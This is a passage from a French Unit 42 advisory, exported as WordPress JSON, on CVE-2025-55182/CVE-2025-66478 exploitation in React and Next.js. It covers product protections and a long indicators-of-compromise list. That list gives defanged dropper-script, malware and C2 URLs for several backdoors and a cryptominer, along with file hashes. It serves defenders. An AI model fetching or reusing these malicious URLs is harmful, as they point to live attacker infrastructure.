(866) 486-4842 (866.4.UNIT42)<\/li>\n<li>Royaume-Uni : +44.20.3743.3660<\/li>\n<li>Europe et Moyen-Orient : +31.20.299.3130<\/li>\n<li>Asie : +65.6983.8730<\/li>\n<li>Japon : +81.50.1790.0200<\/li>\n<li>Australie : +61.2.4062.7950<\/li>\n<li>Inde : 000 800 050 45107<\/li>\n<li>Cor\u00e9e du Sud : +82.080.467.8774<\/li>\n<\/ul>\n<h3><a id=\"post-167644-_k0inen7qtu6v\"><\/a><strong>Pare-feu de Nouvelle G\u00e9n\u00e9ration avec Advanced Threat Prevention<\/strong><\/h3>\n<p>Le<a href=\"https:\/\/docs.paloaltonetworks.com\/ngfw\" target=\"_blank\" rel=\"noopener\"> Next-Generation Firewall<\/a> avec l'abonnement de s\u00e9curit\u00e9<a href=\"https:\/\/docs.paloaltonetworks.com\/advanced-threat-prevention\/administration\" target=\"_blank\" rel=\"noopener\"> Advanced Threat Prevention<\/a> peut aider \u00e0 bloquer les attaques via les signatures Threat Prevention suivantes :<a href=\"https:\/\/www.google.com\/search?q=https:\/\/threatvault.paloaltonetworks.com\/%3Fq%3D96779\" target=\"_blank\" rel=\"noopener\"> 96779<\/a> et<a href=\"https:\/\/www.google.com\/search?q=https:\/\/threatvault.paloaltonetworks.com\/%3Fq%3D96780\" target=\"_blank\" rel=\"noopener\"> 96780<\/a>.<\/p>\n<h3><a id=\"post-167644-_k19usm844c3b\"><\/a><strong>Services de s\u00e9curit\u00e9 fournis par le cloud pour le Pare-feu de Nouvelle G\u00e9n\u00e9ration<\/strong><\/h3>\n<p><a href=\"https:\/\/docs.paloaltonetworks.com\/pan-os\/10-1\/pan-os-new-features\/url-filtering-features\/advanced-url-filtering\" target=\"_blank\" rel=\"noopener\">Advanced URL Filtering<\/a> et<a href=\"https:\/\/docs.paloaltonetworks.com\/pan-os\/10-1\/pan-os-new-features\/url-filtering-features\/advanced-url-filtering\" target=\"_blank\" rel=\"noopener\"> Advanced DNS Security<\/a> identifient les domaines et URL connus associ\u00e9s \u00e0 cette activit\u00e9 comme malveillants.<\/p>\n<h3><a id=\"post-167644-_phe2vghy3d7q\"><\/a><strong>Cortex XDR et XSIAM<\/strong><\/h3>\n<p>Les agents<a href=\"https:\/\/docs-cortex.paloaltonetworks.com\/p\/XDR\" target=\"_blank\" rel=\"noopener\"> Cortex XDR<\/a> et<a href=\"https:\/\/docs-cortex.paloaltonetworks.com\/p\/XSIAM\" target=\"_blank\" rel=\"noopener\"> XSIAM<\/a> aident \u00e0 prot\u00e9ger contre les activit\u00e9s post-exploitation gr\u00e2ce \u00e0 une approche de protection multicouche.<\/p>\n<p><a href=\"https:\/\/docs-cortex.paloaltonetworks.com\/p\/XSOAR\" target=\"_blank\" rel=\"noopener\">Cortex<\/a> a publi\u00e9 un pack de r\u00e9ponse et un playbook pour<a href=\"https:\/\/www.google.com\/search?q=https:\/\/xsoar.pan.dev\/docs\/reference\/playbooks\/CVE-2025-55182_and_CVE-2025-66478_-_React_and_Next_js_Remote_Code_Execution\" target=\"_blank\" rel=\"noopener\"> CVE-2025-55182 (React) et CVE-2025-66478 (Next.js)<\/a> afin d'aider \u00e0 automatiser et acc\u00e9l\u00e9rer le processus d'att\u00e9nuation.<\/p>\n<p>Ce playbook automatise les t\u00e2ches suivantes :<\/p>\n<ul>\n<li>Collecte des indicateurs de l'article de Unit 42<\/li>\n<li>D\u00e9tection de toute ligne de commande suspecte indicative de l'exploitation de ces vuln\u00e9rabilit\u00e9s via une requ\u00eate XQL<\/li>\n<li>Investigation des lignes de commande pour identifier les indicateurs malveillants li\u00e9s aux vuln\u00e9rabilit\u00e9s<\/li>\n<li>Chasse (hunting) aux indicateurs malveillants via une requ\u00eate XQL<\/li>\n<li>Isolation des serveurs React et Next.js compromis (n\u00e9cessite l'approbation d'un analyste)<\/li>\n<li>Blocage des indicateurs malveillants<\/li>\n<li>Fourniture de recommandations d'att\u00e9nuation<\/li>\n<\/ul>\n<h3><a id=\"post-167644-_nixcbw3whaic\"><\/a><strong>Cortex Xpanse<\/strong><\/h3>\n<p><a href=\"https:\/\/docs-cortex.paloaltonetworks.com\/p\/XPANSE\" target=\"_blank\" rel=\"noopener\">Cortex Xpanse<\/a> est con\u00e7u pour identifier les appareils et applications expos\u00e9s sur l'internet public et remonter ces d\u00e9couvertes aux d\u00e9fenseurs. Les clients peuvent activer les alertes sur les actifs potentiellement \u00e0 risque en s'assurant que la r\u00e8gle de surface d'attaque \"Vercel Next.js\" est activ\u00e9e.<\/p>\n<p><span style=\"font-weight: 400;\">De plus, Xpanse a publi\u00e9 un test de surface d'attaque pour la CVE-2025-55182. Ce dernier valide la vuln\u00e9rabilit\u00e9 via une v\u00e9rification directe de RCE, en tentant d'ex\u00e9cuter une charge utile de commande b\u00e9nigne compatible avec les syst\u00e8mes Linux et Windows.<\/span><\/p>\n<p>Notamment, ces applications React et Next.js n'exposent pas publiquement les d\u00e9tails de version du logiciel, ce qui signifie que ces d\u00e9tections ne sont pas un indicateur fort d'une application vuln\u00e9rable. Ces d\u00e9tections sont \u00e9galement disponibles pour les clients Cortex XSIAM ayant achet\u00e9 le module ASM.<\/p>\n<h3><a id=\"post-167644-_ur75h5xvzyxq\"><\/a><strong>Cortex Cloud<\/strong><\/h3>\n<p><a href=\"https:\/\/www.google.com\/search?q=https:\/\/docs-cortex.paloaltonetworks.com\/p\/Cortex%2BCLOUD\" target=\"_blank\" rel=\"noopener\">Cortex Cloud<\/a> fournit des capacit\u00e9s ASPM compl\u00e8tes pour identifier rapidement la port\u00e9e des CVE-2025-55182 et CVE-2025-66478 \u00e0 travers votre paysage applicatif. Gr\u00e2ce \u00e0 la visibilit\u00e9 SBOM en temps r\u00e9el, les \u00e9quipes de s\u00e9curit\u00e9 peuvent interroger instantan\u00e9ment leur inventaire logiciel pour identifier les instances sp\u00e9cifiques des paquets React (versions 19.0\u201319.2) et Next.js (versions 15.x\u201316.x) vuln\u00e9rables. Le mod\u00e8le de risque op\u00e9rationnel de la plateforme aide davantage \u00e0 la priorisation en \u00e9valuant la sant\u00e9 des composants et les risques signal\u00e9s. De mani\u00e8re cruciale, les \u00e9quipes peuvent appliquer des garde-fous ax\u00e9s sur la pr\u00e9vention pour bloquer automatiquement les builds contenant ces vuln\u00e9rabilit\u00e9s critiques. Cela garantit qu'aucune application reposant sur l'impl\u00e9mentation non sanctionn\u00e9e ou non corrig\u00e9e du protocole Flight ne puisse jamais \u00eatre d\u00e9ploy\u00e9e, arr\u00eatant efficacement le vecteur RCE avant qu'il n'entre dans votre environnement.<\/p>\n<h3><a id=\"post-167644-_u97gmar09nbb\"><\/a><strong>Prisma Cloud<\/strong><\/h3>\n<p><a href=\"https:\/\/www.paloaltonetworks.com\/prisma\/cloud\" target=\"_blank\" rel=\"noopener\">Prisma Cloud<\/a> d\u00e9tecte la pr\u00e9sence de ces vuln\u00e9rabilit\u00e9s critiques au sein de votre base de code, vos registres et vos environnements d'ex\u00e9cution. Le scanner de vuln\u00e9rabilit\u00e9 de la plateforme identifie sp\u00e9cifiquement l'utilisation des paquets react-server et next affect\u00e9s associ\u00e9s aux CVE-2025-55182 et CVE-2025-66478. Au-del\u00e0 de la d\u00e9tection, vous pouvez configurer des r\u00e8gles d'application pour bloquer activement les builds et les d\u00e9ploiements si ces d\u00e9couvertes de haute s\u00e9v\u00e9rit\u00e9 sont d\u00e9tect\u00e9es. En faisant surface \u00e0 ces risques et en appliquant un seuil d'\u00e9chec pour les CVE critiques, Prisma Cloud permet aux \u00e9quipes d'emp\u00eacher la publication d'applications ex\u00e9cutant des versions susceptibles, garantissant que seuls les frameworks durcis et corrig\u00e9s atteignent la production.<\/p>\n<h2><a id=\"post-167644-_d28guvflp8ao\"><\/a>Indicateurs de compromission (IoC)<\/h2>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">140[.]99[.]223[.]178\u00a0<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">156[.]234[.]209[.]103<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">38[.]162[.]112[.]141<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">45[.]32[.]158[.]54<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">46[.]36[.]37[.]85<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">47[.]84[.]79[.]46<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">95[.]169[.]180[.]135<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">45.134.174[.]235\/2.sh<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">45.134.174[.]235\/solra<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/46[.]36[.]37[.]85:12000\/sex[.]sh<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/115[.]42[.]60[.]223:61236\/slt<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/45[.]32[.]158[.]54\/5e51aff54626ef7f\/x86_64<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/115[.]42[.]60[.]223:61236\/slt<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/156[.]234[.]209[.]103:20912\/get[.]sh<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/156[.]234[.]209[.]103:20913\/get[.]sh<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/45[.]32[.]158[.]54\/5e51aff54626ef7f\/x86_64<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/46[.]36[.]37[.]85:12000\/sex[.]sh<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/95[.]169[.]180[.]135:8443\/pamssod<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/res[.]qiqigece[.]top\/nginx1<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxps:\/\/raw[.]githubusercontent[.]com\/C3Pool\/xmrig_setup\/master\/setup_c3pool_miner[.]sh<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxps:\/\/sup001[.]oss-cn-hongkong[.]aliyuncs[.]com\/123\/python1[.]sh<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">reactcdn[.]windowserrorapis[.]com<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">res[.]qiqigece[.]top<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">ebdb85704b2e7ced3673b12c6f3687bc0177a7b1b3caef110213cc93a75da837<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">f88ce150345787dd1bcfbc301350033404e32273c9a140f22da80810e3a3f6ea<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">fc9e53675e315edeea2292069c3fbc91337c972c936ca0f535da01760814b125<\/span><\/li>\n<\/ul>\n<h3><a id=\"post-167644-_xy8gs05jyta7\"><\/a><strong>BPFDoor<\/strong><\/h3>\n<ul>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">140.99.223[.]178\/32736<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">1f3f0695c7ec63723b2b8e9d50b1838df304821fcb22c7902db1f8248a812035<\/span><\/li>\n<\/ul>\n<h3><a id=\"post-167644-_jp1bee1d5oui\"><\/a><strong>EtherRAT<\/strong><\/h3>\n<ul>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">hxxp:\/\/193.24.123[.]68:3001\/gfdsgsdfhfsd_ghsfdgsfdgsdfg.sh<\/span><\/li>\n<\/ul>\n<h3><a id=\"post-167644-_z3otwk54q6y2\"><\/a><strong>Noodle RAT<\/strong><\/h3>\n<ul>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">192.238.202[.]17<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">tcp:\/\/vip[.]kof97.lol:443<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">hxxp:\/\/146.88.129[.]138:5511\/443nb64<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">33641bfbbdd5a9cd2320c61f65fe446a2226d8a48e3bd3c29e8f916f0592575f<\/span><\/li>\n<\/ul>\n<h3><a id=\"post-167644-_63wwgd68z81v\"><\/a><strong>SNOWLIGHT<\/strong><\/h3>\n<ul>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">115[.]42[.]60[.]223<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">a455731133c00fdd2a141bdfba4def34ae58195126f762cdf951056b0ef161d4<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">1663d98c259001f1b03f82d0c5bee7cfd3c7623ccb83759c994f9ab845939665<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">18c68a982f91f665effe769f663c51cb0567ea2bfc7fab6a1a40d4fe50fc382b<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">1a3e7b4ee2b2858dbac2d73dd1c52b1ea1d69c6ebb24cc434d1e15e43325b74e<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">1cdd9b0434eb5b06173c7516f99a832dc4614ac10dda171c8eed3272a5e63d20<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">1e31dc074a4ea7f400cb969ea80e8855b5e7486660aab415da17591bc284ac5b<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">2b0dc27f035ba1417990a21dafb361e083e4ed94a75a1c49dc45690ecf463de4<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">2ca913556efd6c45109fd8358edb18d22a10fb6a36c1ab7b2df7594cd5b0adbc<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">4ff096fbea443778fec6f960bf2b9c84da121e6d63e189aebaaa6397d9aac948<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">55ae00bc8482afd085fd128965b108cca4adb5a3a8a0ee2957d76f33edd5a864<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">62e9a01307bcf85cdaeecafd6efb5be72a622c43a10f06d6d6d3b566b072228d<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">7d25a97be42b357adcc6d7f56ab01111378a3190134aa788b1f04336eb924b53<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">7f05bad031d22c2bb4352bf0b6b9ee2ca064a4c0e11a317e6fedc694de37737a<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">9c931f7f7d511108263b0a75f7b9fcbbf9fd67ebcc7cd2e5dcd1266b75053624<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">ac2182dfbf56d58b4d63cde3ad6e7a52fed54e52959e4c82d6fc999f20f8d693<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">ac7027f30514d0c00d9e8b379b5ad8150c9827c827dc7ee54d906fc2585b6bf6<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">b38ec4c803a2d84277d9c598bfa5434fb8561ddad0ec38da6f9b8ece8104d787<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">bc31561c44a36e1305692d0af673bc5406f4a5bb2c3f2ffdb613c09b4e80fa9f<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">bf602b11d99e815e26c88a3a47eb63997d43db8b8c60db06d6fbddf386fd8c4a<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">d704541cde64a3eef5c4f80d0d7f96dc96bae8083804c930111024b274557b16<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">d9313f949af339ed9fafb12374600e66b870961eeb9b2b0d4a3172fd1aa34ed0<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">e2d7c8491436411474cef5d3b51116ddecfee68bab1e15081752a54772559879<\/span><\/li>\n<\/ul>\n<h3><a id=\"post-167644-_3cskknb72gp4\"><\/a><strong>VSHell<\/strong><\/h3>\n<ul>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">4a759cbc219bcb3a1f8380a959307b39873fb36a9afd0d57ba0736ad7a02763b<\/span><\/li>\n<\/ul>\n<h2><a id=\"post-167644-_kld6oivnvqsl\"><\/a>Ressources suppl\u00e9mentaires<\/h2>\n<ul>\n<li><a href=\"https:\/\/www.sysdig.com\/blog\/unc5174-chinese-threat-actor-vshell\" target=\"_blank\" rel=\"noopener\">L'\u00e9volution de UNC5174 dans la cyberguerre en cours en Chine : De SNOWLIGHT \u00e0 VShell<\/a> \u2013 Blog, Sysdig<\/li>\n<li><a href=\"https:\/\/cloud.google.com\/blog\/topics\/threat-intelligence\/initial-access-brokers-exploit-f5-screenconnect\" target=\"_blank\" rel=\"noopener\">Le retour de l'acc\u00e8s \u2014 Les courtiers en acc\u00e8s initial exploitent F5 BIG-IP (CVE-2023-46747) et ScreenConnect<\/a> \u2013 Blog Google Cloud<\/li>\n<li><a href=\"https:\/\/hivepro.com\/threat-advisory\/unc5174-functions-as-an-initial-access-broker-exploiting-vulnerabilities\/\" target=\"_blank\" rel=\"noopener\">UNC5174 op\u00e8re comme un courtier en acc\u00e8s initial en exploitant des vuln\u00e9rabilit\u00e9s<\/a> \u2013 Rapport de vuln\u00e9rabilit\u00e9 Hive Pro<\/li>\n<\/ul>\n<p><em>Mise \u00e0 jour \u00e0 15h45 PT pour ajouter des mises \u00e0 jour importantes. Celles-ci incluent une section sur l'activit\u00e9 post-exploitation et la couverture produit. La nouvelle activit\u00e9 couvre : le scan et la reconnaissance, le vol d'identifiants cloud, les scripts dropper malveillants, le cryptomining, le d\u00e9ploiement de la backdoor NOODLERAT, l'ex\u00e9cution de SNOWLIGHT et VShell, et l'activit\u00e9 li\u00e9e \u00e0 la Chine.<\/em><\/p>\n<p><em>Mise \u00e0 jour du 9 d\u00e9cembre 2025, \u00e0 14h00 PT pour ajouter des mises \u00e0 jour importantes. Celles-ci incluent des d\u00e9tails suppl\u00e9mentaires dans la section sur l'activit\u00e9 post-exploitation. Les nouvelles sous-sections comprennent des informations sur : l'activit\u00e9 pr\u00e9sentant des chevauchements avec les outils de la RPDC utilisant EtherRAT ; BPFDoor, une backdoor Linux ; et une nouvelle variante Auto-color (une backdoor Linux). Mise \u00e0 jour de la section Indicateurs de compromission. Ajout d'une nouvelle signature Threat Prevention.<\/em><\/p>\n<p><em>Mis \u00e0 jour le 10 d\u00e9cembre 2025 \u00e0 13 h 30 PT pour ajouter une sous-section sur les tentatives d'exploitation React2Shell dans la section Activit\u00e9 post-exploitation. Ajout de la couverture et des informations relatives aux playbooks Cortex XDR.<\/em><\/p>\n<p><em><span style=\"font-weight: 400;\">Mis \u00e0 jour le 11 d\u00e9cembre 2025 \u00e0 13 h 30 PT pour ajouter un script \u00e0 la sous-section sur les tentatives d'exploitation React2Shell dans la section Activit\u00e9 de post-exploitation. La formulation concernant Cortex Xpanse a \u00e9t\u00e9 modifi\u00e9e.<\/span><\/em><\/p>\n<p><i><span style=\"font-weight: 400;\">Mis \u00e0 jour le 12 d\u00e9cembre 2025 \u00e0 13 h 40 PT pour modifier la formulation concernant l'attribution \u00e0 CL-STA-1015 et remplacer le nom BPFDoor par KSwapDoor avec des d\u00e9tails suppl\u00e9mentaires.<\/span><\/i><\/p>\n<p><i><span style=\"font-weight: 400;\">\u200b\u200bMis \u00e0 jour le 15 d\u00e9cembre 2025 \u00e0 14 h 00 PT pour ajouter une mise \u00e0 jour sur KSwapDoor \u00e0 la section R\u00e9sum\u00e9 ex\u00e9cutif. Petites modifications apport\u00e9es par souci de clart\u00e9.<\/span><\/i><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Nous examinons la vuln\u00e9rabilit\u00e9 RCE not\u00e9e CVSS 10.0 dans le protocole Flight utilis\u00e9 par les React Server Components. Elle est r\u00e9pertori\u00e9e sous la r\u00e9f\u00e9rence CVE-2025-55182.<\/p>\n","protected":false},"author":23,"featured_media":167623,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"inline_featured_image":false,"footnotes":""},"categories":[8769,8850],"tags":[9835,9819,9820,9476,9468],"product_categories":[8965,8955,9005,9041,9046,9053,9077,9064,9083,9015,9151],"coauthors":[1025],"class_list":["post-167644","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-top-cyberthreats-fr","category-vulnerabilities-fr","tag-cobalt-strike-fr","tag-cve-2025-55182-fr","tag-cve-2025-66478-fr","tag-remote-code-execution-fr","tag-web-shells-fr","product_categories-advanced-threat-prevention-fr","product_categories-cloud-delivered-security-services-fr","product_categories-code-to-cloud-platform-fr","product_categories-cortex-fr","product_categories-cortex-cloud-fr","product_categories-cortex-xdr-fr","product_categories-cortex-xpanse-fr","product_categories-cortex-xsiam-fr","product_categories-next-generation-firewall-fr","product_categories-prisma-cloud-fr","product_categories-unit-42-incident-response-fr"],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v27.0 (Yoast SEO v27.0) - https:\/\/yoast.com\/product\/yoast-seo-premium-wordpress\/ -->\n<title>Exploitation d&#039;une vuln\u00e9rabilit\u00e9 critique dans les React Server Components (Mise \u00e0 jour du 12 d\u00e9cembre)<\/title>\n<meta name=\"description\" content=\"Nous examinons la vuln\u00e9rabilit\u00e9 RCE not\u00e9e CVSS 10.0 dans le protocole Flight utilis\u00e9 par les React Server Components. Elle est r\u00e9pertori\u00e9e sous la r\u00e9f\u00e9rence CVE-2025-55182.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/unit42.paloaltonetworks.com\/fr\/cve-2025-55182-react-and-cve-2025-66478-next\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Exploitation d&#039;une vuln\u00e9rabilit\u00e9 critique dans les React Server Components (Mise \u00e0 jour du 12 d\u00e9cembre)\" \/>\n<meta property=\"og:description\" content=\"Nous examinons la vuln\u00e9rabilit\u00e9 RCE not\u00e9e CVSS 10.0 dans le protocole Flight utilis\u00e9 par les React Server Components. Elle est r\u00e9pertori\u00e9e sous la r\u00e9f\u00e9rence CVE-2025-55182.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/unit42.paloaltonetworks.com\/fr\/cve-2025-55182-react-and-cve-2025-66478-next\/\" \/>\n<meta property=\"og:site_name\" content=\"Unit 42\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-12T17:01:33+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-12-16T15:10:21+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/12\/02_Vulnerabilities_1920x900.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1920\" \/>\n\t<meta property=\"og:image:height\" content=\"900\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Unit 42\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"Exploitation d'une vuln\u00e9rabilit\u00e9 critique dans les React Server Components (Mise \u00e0 jour du 12 d\u00e9cembre)","description":"Nous examinons la vuln\u00e9rabilit\u00e9 RCE not\u00e9e CVSS 10.0 dans le protocole Flight utilis\u00e9 par les React Server Components. Elle est r\u00e9pertori\u00e9e sous la r\u00e9f\u00e9rence CVE-2025-55182.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/unit42.paloaltonetworks.com\/fr\/cve-2025-55182-react-and-cve-2025-66478-next\/","og_locale":"fr_FR","og_type":"article","og_title":"Exploitation d'une vuln\u00e9rabilit\u00e9 critique dans les React Server Components (Mise \u00e0 jour du 12 d\u00e9cembre)","og_description":"Nous examinons la vuln\u00e9rabilit\u00e9 RCE not\u00e9e CVSS 10.0 dans le protocole Flight utilis\u00e9 par les React Server Components. Elle est r\u00e9pertori\u00e9e sous la r\u00e9f\u00e9rence CVE-2025-55182.","og_url":"https:\/\/unit42.paloaltonetworks.com\/fr\/cve-2025-55182-react-and-cve-2025-66478-next\/","og_site_name":"Unit 42","article_published_time":"2025-12-12T17:01:33+00:00","article_modified_time":"2025-12-16T15:10:21+00:00","og_image":[{"width":1920,"height":900,"url":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/12\/02_Vulnerabilities_1920x900.jpg","type":"image\/jpeg"}],"author":"Unit 42","twitter_card":"summary_large_image","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/unit42.paloaltonetworks.com\/fr\/cve-2025-55182-react-and-cve-2025-66478-next\/#article","isPartOf":{"@id":"https:\/\/unit42.paloaltonetworks.com\/fr\/cve-2025-55182-react-and-cve-2025-66478-next\/"},"author":{"name":"Unit 42","@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/a891f81d18648a1e0bab742238d31a63"},"headline":"Exploitation d'une vuln\u00e9rabilit\u00e9 critique dans les React Server Components (Mise \u00e0 jour du 12 d\u00e9cembre)","datePublished":"2025-12-12T17:01:33+00:00","dateModified":"2025-12-16T15:10:21+00:00","mainEntityOfPage":{"@id":"https:\/\/unit42.paloaltonetworks.com\/fr\/cve-2025-55182-react-and-cve-2025-66478-next\/"},"wordCount":5622,"image":{"@id":"https:\/\/unit42.paloaltonetworks.com\/fr\/cve-2025-55182-react-and-cve-2025-66478-next\/#primaryimage"},"thumbnailUrl":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/12\/02_Vulnerabilities_1920x900.jpg","keywords":["Cobalt Strike","CVE-2025-55182","CVE-2025-66478","Remote Code Execution","web shells"],"articleSection":["Menaces de grande envergure","Vuln\u00e9rabilit\u00e9s"],"inLanguage":"fr-FR"},{"@type":"WebPage","@id":"https:\/\/unit42.paloaltonetworks.com\/fr\/cve-2025-55182-react-and-cve-2025-66478-next\/","url":"https:\/\/unit42.paloaltonetworks.com\/fr\/cve-2025-55182-react-and-cve-2025-66478-next\/","name":"Exploitation d'une vuln\u00e9rabilit\u00e9 critique dans les React Server Components (Mise \u00e0 jour du 12 d\u00e9cembre)","isPartOf":{"@id":"https:\/\/unit42.paloaltonetworks.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/unit42.paloaltonetworks.com\/fr\/cve-2025-55182-react-and-cve-2025-66478-next\/#primaryimage"},"image":{"@id":"https:\/\/unit42.paloaltonetworks.com\/fr\/cve-2025-55182-react-and-cve-2025-66478-next\/#primaryimage"},"thumbnailUrl":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/12\/02_Vulnerabilities_1920x900.jpg","datePublished":"2025-12-12T17:01:33+00:00","dateModified":"2025-12-16T15:10:21+00:00","author":{"@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/a891f81d18648a1e0bab742238d31a63"},"description":"Nous examinons la vuln\u00e9rabilit\u00e9 RCE not\u00e9e CVSS 10.0 dans le protocole Flight utilis\u00e9 par les React Server Components. Elle est r\u00e9pertori\u00e9e sous la r\u00e9f\u00e9rence 